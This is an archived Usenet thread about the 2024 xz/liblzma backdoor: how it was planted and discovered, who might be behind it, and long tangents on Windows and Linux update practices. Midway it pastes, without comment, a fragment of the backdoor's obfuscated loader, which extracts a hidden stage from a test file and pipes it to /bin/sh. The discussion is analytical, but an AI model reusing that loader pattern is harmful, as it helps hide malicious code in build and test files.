Can someone explain how this happened?
https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
Was it an insider who did it, or an outsider (China perhaps, for example)?
"Indira" <indira@ghandi.net> wrote
| Can someone explain how this happened?
|
| https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
|
| Was it an insider who did it, or an outsider (China perhaps, for example)?
It appears that no one really knows: https://news.ycombinator.com/item?id=39865810
It shouldn't be surprising. It's a massive web of constantly
changing software, overseen by a massive boys' club of geeks,
constantly forcing dripfeed updates onto Linux installs. As the
saying goes, "What could go wrong?"
The pattern is endemic to Linux culture: The OS itself is
an ongoing project
My install of OpenSuse would be downloading
hundreds of micro-updates per week if I didn't stop it.
I never chose any setting telling it to function as unsupervised
spyware, constantly calling home for updates.
The
whole approach is a ridiculous mess. How could quality control
possibly be carried out on so many constant changes?
On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:
Can someone explain how this happened?
https://thehackernews.com/2024/03/urgent-secret-backdoor-found-in-xz.html
Was it an insider who did it, or an outsider (China perhaps, for example)?
Summary based on my reading of various posts and emails (not guaranteed
to be complete, or completely current/accurate)
Bad actor weasles their way into the xz/liblzma project (the owner/maintainer of the project seems to be an overworked one-man-band, and while the project is peripheral to major systems, it is still part of the necessary infrastructure).
Bad actor builds up enough good will to be named as a co-maintainer of the project.
Bad actor gradually (over the course of a couple of years) checks in various patches that, under a seemingly complex set of build requirements (X86 Linux, debian or redhat derivative with systemd, etc), causes liblzma code to manipulate
the internals of sshd to backpatch it with an RCE backdoor.
The bad actor used a vaguely chinese name, and hid behind a VPN with a public endpoint in (IIRC) Singapore. BUT, there's no obvious way to tie such an anonymous
actor to a specific country; names can be assumed, VPNs can disguise locations,
and the email address was a generic gmail address available worldwide.
As for the discovery: a Postgresql developer was performing some tuning, and found a half-second discrepancy in how long it took sshd to authenticate connections. Much deep diving with profiling tools later, the developer tracked
down the delay and found all the mess that the bad actor installed.
The developer reported it to various interested parties two days ago, and the story unfolded from there.
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
I've had to make efforts to block these unknown updates
in both Win10 and Suse. (And yes, it is in the 100s. I had
my firewall down briefly after a week or two when Suse couldn't
call home. It told me I had 360 updates waiting. What are
they? Who knows. Most of the ames are not informative, even
if I wanted to look through 360 updates. It's nuts. I didn't
agree to be a beta testing volunteer for programmers who
can't stop fiddling. I'm guessing they may spend more time
rebuilding the install package than actually writing the software.)
The way it used to work is that software was thoroughly
tested before release. Then another version might come out
in maybe a year. At that point people might try it out, or they
might wait for reviews. And one could easily find a list of
actual changes in the new version. Most of my Windows software
hasn't been updated in ages and still works fine. But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
Apple is a different thing. They serve a consumer-only audience,
updating periodically with stable releases and quickly dropping
support for older products. Their aim is to sell a lot of very
dependable devices to a tech-illiterate customer base, which is
a different business model.
If someone screws up and needs to issue a fix, that's fine.
But it shouldn't happen very often. An OS on a computer that's
actually in use shouldn't be getting dripfeed updates. It should
be getting updates rarely and then with good reason. MS know that.
That's why they let corporate customers update periodically and
test out the changes before rolling them out.
Was it an insider who did it, or an outsider (China perhaps, for example)?
Bad actor probably paid by some country or mafia with money and resources.
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
The developer reported it to various interested parties two days ago, and the story unfolded from there.
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw--lzma1 -dc|/bin/sh
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
I've had to make efforts to block these unknown updates
in both Win10 and Suse.
my firewall down briefly after a week or two when Suse couldn't
call home.
It told me I had 360 updates waiting. What are
they?
I didn't
agree to be a beta testing volunteer for programmers who
can't stop fiddling. I'm guessing they may spend more time
rebuilding the install package than actually writing the software.)
The way it used to work is that software was thoroughly
tested before release.
Then another version might come out
in maybe a year.
And one could easily find a list of
actual changes in the new version.
Most of my Windows software
hasn't been updated in ages and still works fine.
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
Apple is a different thing. They serve a consumer-only audience,
updating periodically with stable releases and quickly dropping
support for older products.
If someone screws up and needs to issue a fix, that's fine.
But it shouldn't happen very often. An OS on a computer that's
actually in use shouldn't be getting dripfeed updates.
be getting updates rarely and then with good reason. MS know that.
That's why they let corporate customers update periodically and
test out the changes before rolling them out.
"Carlos E.R." <robin_listas@es.invalid> wrote
| > The way it used to work is that software was thoroughly
| > tested before release. Then another version might come out
| > in maybe a year. At that point people might try it out, or they
| > might wait for reviews. And one could easily find a list of
| > actual changes in the new version. Most of my Windows software
| > hasn't been updated in ages and still works fine. But Microsoft and
| > Linux are now both guilty of seat-of-the-pants updating. If it
| > isn't stopped, Windows will show a message at boot every few
| > days: "Please wait. Installing updates."
|
| You should read "The cathedral and the bazaar".
|
That's addressing how to develop software. But then there's
the point at which the software is done, thoroughly tested,
and put to use. It needs to be well designed and stable. It
needs to do what people need. Then it needs to stay put.
Software shouldn't be a sexy business, with constant redesign.
What happens more often than not in the Linux world might
be called the greasemonkey syndrome. That's the case where
someone has a car on his front lawn and continually works
on tuning it up, adding scoops, and so on. He never quite gets
around to driving the car. He just likes to tinker.
For all Microsoft's faults, there's the advantage that their business depends on business users. So Windows has to be stable, it has to
have a well documented API, and backward compatibility is critical
because businesses build their own inhouse software. I can write
software today on Windows that runs on every Windows machine in
the world, with no support files needed. With Macs one gets 2-3
years backard compatibility. With Linux it's a moving target. I'm
still using a 25 year old Paint Shop Pro on my 23 year old WinXP.
I'm still using current Firefox on 14 year old Win7. I had to update
my 4 year old Raspberry Pi OS because it couldn't run the latest
Chromium. It could only run Chromium 92, released in 2021. The
whole thing has to be periodically replaced.
On 31/03/2024 20.17, Newyana2 wrote:
"J.O. Aho" <user@example.net> wrote
| > The
| > whole approach is a ridiculous mess. How could quality control
| > possibly be carried out on so many constant changes?
|
| Quite simple, most open source projects can get free static code
| inspection (this can be automated say when a pull request is made), a
| review is always needed before code are merged (how good it is depends
| on the maintainers, all from sloppy microsoft standard to BSD high
| standard) . This is the same way as most closed source projects also
are
| done.
|
I don't see it as a closed vs open issue. Microsoft
now do the same dripfeed updating. Essentially, the
SOHo customer base are now an unpaid beta testing
army.
That was the feeling one got reading, bashing on open source development model, which in reality don't be that much different from remote working setups with the exception that developers not gone trough a silly
interview.
I've had to make efforts to block these unknown updates
in both Win10 and Suse.
In microsoft updates you can't opt out from specific updates, everything
is bundled together, while for example with Suse you can block specific packages from being updated (in the long run you may get a dependency
issue, not my problem).
; (And yes, it is in the 100s. I had
my firewall down briefly after a week or two when Suse couldn't
call home.
What you call for calling home for Suse is just a fetch of the latest
status on what packages exists in the remote repository and some
metadata, so it's one way communication, sure the remote end could store
your IP and which repository you was fetching from.
It's on your local system that the calculation is done which packages
are needed to be installed to get everything up to latest version.
This differs much from the microsoft way, which you tell everything to microsoft and they tell you what to install.
Please don't be stupid, keep your stuff up to date, it's not about you,
but it's about everyone else as when you are part of a botnet everyone
else will be affected of your bad decisions.
"Carlos E.R." <robin_listas@es.invalid> wrote:
Bad actor probably paid by some country or mafia with money and resources. >>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
"J.O. Aho" <user@example.net> wrote
| Please don't be stupid, keep your stuff up to date, it's not about you,
| but it's about everyone else as when you are part of a botnet everyone
| else will be affected of your bad decisions.
|
Now that you mention it, that sounds like good advice.
I am too stupid to manage security on my computer. I'm
not even a Linux engineer. So I'll do as you recommend.
I think my compression libs are out of date and I've heard
there's a nifty one called "xz". Maybe I'll get that. When do
you advise me to update it again? This afternoon? Or is
tonight good enough? :)
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active hours'.
And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.
[...]
On 3/31/2024 2:11 PM, Lew Pitcher wrote:[snip]
Vegard Nossum wrote a script to detect if it's likely that the ssh binary
on a
system is vulnerable, attached here. Thanks!
Greetings,
Andres Freund
View attachment "injected.txt" of type "text/plain" (8236 bytes)
Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)
Download attachment "detect.sh" of type "application/x-sh" (426 bytes) Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is
counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your
"Carlos E.R." <robin_listas@es.invalid> wrote
| > That's addressing how to develop software. But then there's
| > the point at which the software is done, thoroughly tested,
| > and put to use. It needs to be well designed and stable. It
| > needs to do what people need. Then it needs to stay put.
|
| Software is never done.
|
The normalization of that view is what's led to the acceptance
of a seat-of-the-pants rolling beta approach. Your statement
has no context. A lot of software is more than done. If the
software does what you need and it's stable, why would you
dump it for something else?
of it is 25 years old. It works dependably. It doesn't need
security patches.
J.O. makes a valid case for security with software that goes online.
OK. (Even though that's rather ironic in this particular thread.)
But security isn't just a matter of putting fingers in the dike once
a week. It's about making a solid product in the first place and
then dealing with risk.
For instance, Firefox updates about every 10 days. Why?
["Followup-To:" header set to alt.os.linux.]
Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active hours'.
And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.
[...]
I think I've heard of Windows ignoring that sometimes.
Bad actor probably paid by some country or mafia with money and resources. >>>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
Wrong. The source code of xz was compromised.
On 31/03/2024 19:17, Newyana2 wrote:[...]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped selling OS updates - which Microsoft still kinda does - as it made sense
to have as many users as possible on the latest and most up-to-date OS version.
Charging for updates means users won't update in a timely manner and
that leaves MS with the headache of having to support multiple versions concurrently which is expensive and inefficient.
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that
'Followup-To:' is nearly always inappropriate.)
Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
Newyana2 <Newyana2@invalid.nospam> wrote:
[...]
But Microsoft and
Linux are now both guilty of seat-of-the-pants updating. If it
isn't stopped, Windows will show a message at boot every few
days: "Please wait. Installing updates."
With "every few days" actually being *a month* and you only get a
"Please wait." message if you're stupid enough not to set your 'Active
hours'.
And "at boot every few days"!? My system is up from one monthly update >> > cycle to the next, no silly business with booting in between.
[...]
I think I've heard of Windows ignoring that sometimes.
I think you've heard wrong. Never happened to me (for two systems,
Windows 10 and 11) and I can't think of a scenario where it (your set
'Active hours') could be ignored.
You also can set Windows Update to pause for 1, 2, 3, 4 or 5 weeks and
you can reset that pause before it runs out, so you can pause
indefinitely.
Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT):
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that 'Followup-To:' is nearly always inappropriate.)
I've been told the opposite..
Maybe you can still buy some Microsoft Windows upgrades for some niche
corner cases, but effectively all Windows upgrades have been free, ever
since Windows 7 (2009!), till today (Windows 11).
I thought the upgrade to 10 from 7/8 was only free for a while? It also >certainly wasn't "transparent" upgrade.
On 01/04/2024 16:19, Frank Slootweg wrote:
Chris <ithinkiam@gmail.com> wrote:
On 31/03/2024 19:17, Newyana2 wrote:[...]
[About Apple:]
quickly dropping
support for older products.
Which from a security standpoint works very well. Apple long ago stopped >> selling OS updates - which Microsoft still kinda does - as it made sense >> to have as many users as possible on the latest and most up-to-date OS
version.
Maybe you can still buy some Microsoft Windows upgrades for some niche corner cases, but effectively all Windows upgrades have been free, ever since Windows 7 (2009!), till today (Windows 11).
I thought the upgrade to 10 from 7/8 was only free for a while? It also certainly wasn't "transparent" upgrade.
Of course you can still buy full licenses, for systems which come without one, but those are not upgrades.
Although, anyone can use Win10 for free as long as they ignore the
subtle 'nag' from MS. No idea why they still charge so much for Windows. Maybe it's so they can justify the costs to OEMs?
I think the biggest difference is that macOS users quickly transition to
the latest version as it's released: https://www.statista.com/statistics/944559/worldwide-macos-version-market-share/[1]
Whereas windows users like to stick with what they know and Win10 is
still the dominant version with >60% with a mishmash of subversions.
[1] this has highlighted a funny quirk that so many websites can't parse
a macOS user agent version that starts with anything other than 10.x
that ever since the relase of macOS 11 all Macs are reporting the same
UA which is frozen at 10.15. https://bugzilla.mozilla.org/show_bug.cgi?id=1679929
Software is never done.
"J.O. Aho" <user@example.net> wrote
| There is less risk of using the compromised xz tarball than using your
| current ms-windows
You're getting more glib and adversarial with each post.
The risks with Windows depend on a lot of things. As does
the risk with anything. Computers are not hacked by pixies.
They're hacked by people exploiting network communication
methods that are inherently unsafe.
If you don't want to deal with that directly then the best
you can do is to allow the dripfeed updates, run anti-virus,
minimize valuable data that you allow on your computer,
like credit card numbers, and hope that some update doesn't
break your system.
If you're actually going to deal with
security it's more complicated.
Although, anyone can use Win10 for free as long as they ignore theI only bought Windows 1.0 (the 386 version), never since.
subtle 'nag' from MS. No idea why they still charge so much for Windows.
Maybe it's so they can justify the costs to OEMs?
candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT): >>> candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote: >>>> ["Followup-To:" header set to alt.os.linux.]
Ignored, because this is about Windows. (Not to mention that
'Followup-To:' is nearly always inappropriate.)
I've been told the opposite..
That's another wrong thing you've been told! :-)
I won't go in all the situations where it's wrong, but will just take
this example.
If I had honoured your 'Followup-To:', I would not see any responses,
i.e. also not any responses to *my own* response (which is, as I said,
about Windows, *not* Linux), because I'm not subscribed to alt.os.linux.
So you were effectively forcing me - *and* any other user who is not subscribed to alt.os.linux - to subscribe, just because you think it's
the good thing to do.
I hope you realize how inconsiderate and rude that is.
Also a 'Followup-To: alt.comp.os.windows-10' would have been inappropriate, because you cut off any subscribers of alt.os.linux, who
might be interested in further responses.
Bottom line: Do *not* use 'Followup-To:'.
[...]
I've used Windows off and on since 3.1 which came with my first PC, but
only ever bought Win10. I used a pirate version of win98 for a long time
and then linux until I made a gaming rig.
I think my next home computer will be a mac. I'll consider this when win10 goes out of support next year.
"J.O. Aho" <user@example.net> wrote
| There is less risk of using the compromised xz tarball than using your
| current ms-windows
You're getting more glib and adversarial with each post.
The risks with Windows depend on a lot of things. As does
the risk with anything. Computers are not hacked by pixies.
They're hacked by people exploiting network communication
methods that are inherently unsafe.
If you don't want to deal with that directly then the best
you can do is to allow the dripfeed updates, run anti-virus,
minimize valuable data that you allow on your computer,
like credit card numbers, and hope that some update doesn't
break your system. If you're actually going to deal with
security it's more complicated.
"Paul" <nospam@needed.invalid> wrote
| Both ecosystems have had supply chain attacks. There | was also an
attack carried out by a local university, for | which Linus assigned
a "permaban" on their kernel submissions. | That was an attack on
kernel.org . Whereas the XZ one is | a more general Linux one, a test
of how well the system | responds to shenanigans. | | Windows 11
shows an "Extract from" if I highlight an XZ file. | It would appear
the Insider development, is already in | the Release stream. All my
instances of XZ are .tar.xz . |
You have XZ files on Windows?
...To my mind this is all a classic case of placing the blame in the
wrong place. Clearly it's a problem is someone comes up with a hack
of remote access software. But the real problem is that software
itself. Something like SSH shouldn't be in use. Remote Desktop shouldn't be > in use. People just can't even imagine using a computer safely.
Some years ago my starving artist brother called me. He was in a
panic, explaining the "Microsoft" had called him to warn that there
could be repercussions because my brother had not paid his Windows
bill for several years.
On 03/04/2024 14.41, Newyana2 wrote:
"Paul" <nospam@needed.invalid> wrote
Some years ago my starving artist brother called me. He was in a
panic, explaining the "Microsoft" had called him to warn that there
could be repercussions because my brother had not paid his Windows
bill for several years.
This kind of scams been around for a long time, "Hi, this is Microsoft calling..." even I have had those calls, quite fun you can have with the Indian guy on the other side.
It's amazing people still get caught in them... but that is how things
goes when people don't care to learn about the things they use.
Things evolve, with the amount of work they are putting on WSL you shouldn't be surprised that next version of microsoft windows may actually run on a Linux kernel with an api wrapper to allow you to run old windows applications. There was a talk aboutthis already during Balmer's time, you can guess who wasn't happy about the idea.
"Carlos E.R." <robin_listas@es.invalid> wrote:
Bad actor probably paid by some country or mafia with money and resources. >>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
On Mon, 1 Apr 2024 15:20:35 +0200, Carlos E.R. wrote:
Bad actor probably paid by some country or mafia with money and resources. >>>>
https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
Very sophisticated. Their grand scheme was:
1) sneakily backdoor the release tarballs, but not the source code
Wrong. The source code of xz was compromised.
Read that reference again, and read the other references. https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor
It was sneaky. Very sneaky.
It wasn't in the source code.
It was in the packaging/testing code. https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
"The upstream xz repository and the xz tarballs have been backdoored."
Paul wrote on 4/3/24 2:45 PM:
On 4/3/2024 10:18 AM, J.O. Aho wrote:
Things evolve, with the amount of work they are putting on WSL you
shouldn't be surprised that next version of microsoft windows may
actually run on a Linux kernel with an api wrapper to allow you to
run old windows applications. There was a talk about this already
during Balmer's time, you can guess who wasn't happy about the idea.
You won't be surprised, now or in the future.
The internal effort for WSL is marginal(or less than marginal) compared
to the amount of effort on:
- Windows as a service
- Windows 365 (cloud-Windows currently available for Business and Enterprise for a monthly/annual cost per user. Managed via integration
with a variety of supported Admin tools in addition to web via a
designated Windows 365 url of the form(*.microsoft.com).
The next or future version of Windows is(and has been for some time)
skewed towards additional monetization/subscription possibilities(just
like M365 Office plans) than running on a Linux kernel with or without a wrapper.
Windows365 in Business and Enterprise has some unique requirements for
'bring your own pc' use...not the same, but getting closer and closer to
the consumer which 'bring their own pc's to use Windows.
<https://learn.microsoft.com/en-us/windows-365/end-user-hardware-requirements>
<https://learn.microsoft.com/en-us/windows-365/enterprise/cloud-pc-size-recommendations>
Sysop: | Keyop |
---|---|
Location: | Huddersfield, West Yorkshire, UK |
Users: | 361 |
Nodes: | 16 (2 / 14) |
Uptime: | 123:17:42 |
Calls: | 7,716 |
Files: | 12,861 |
Messages: | 5,727,955 |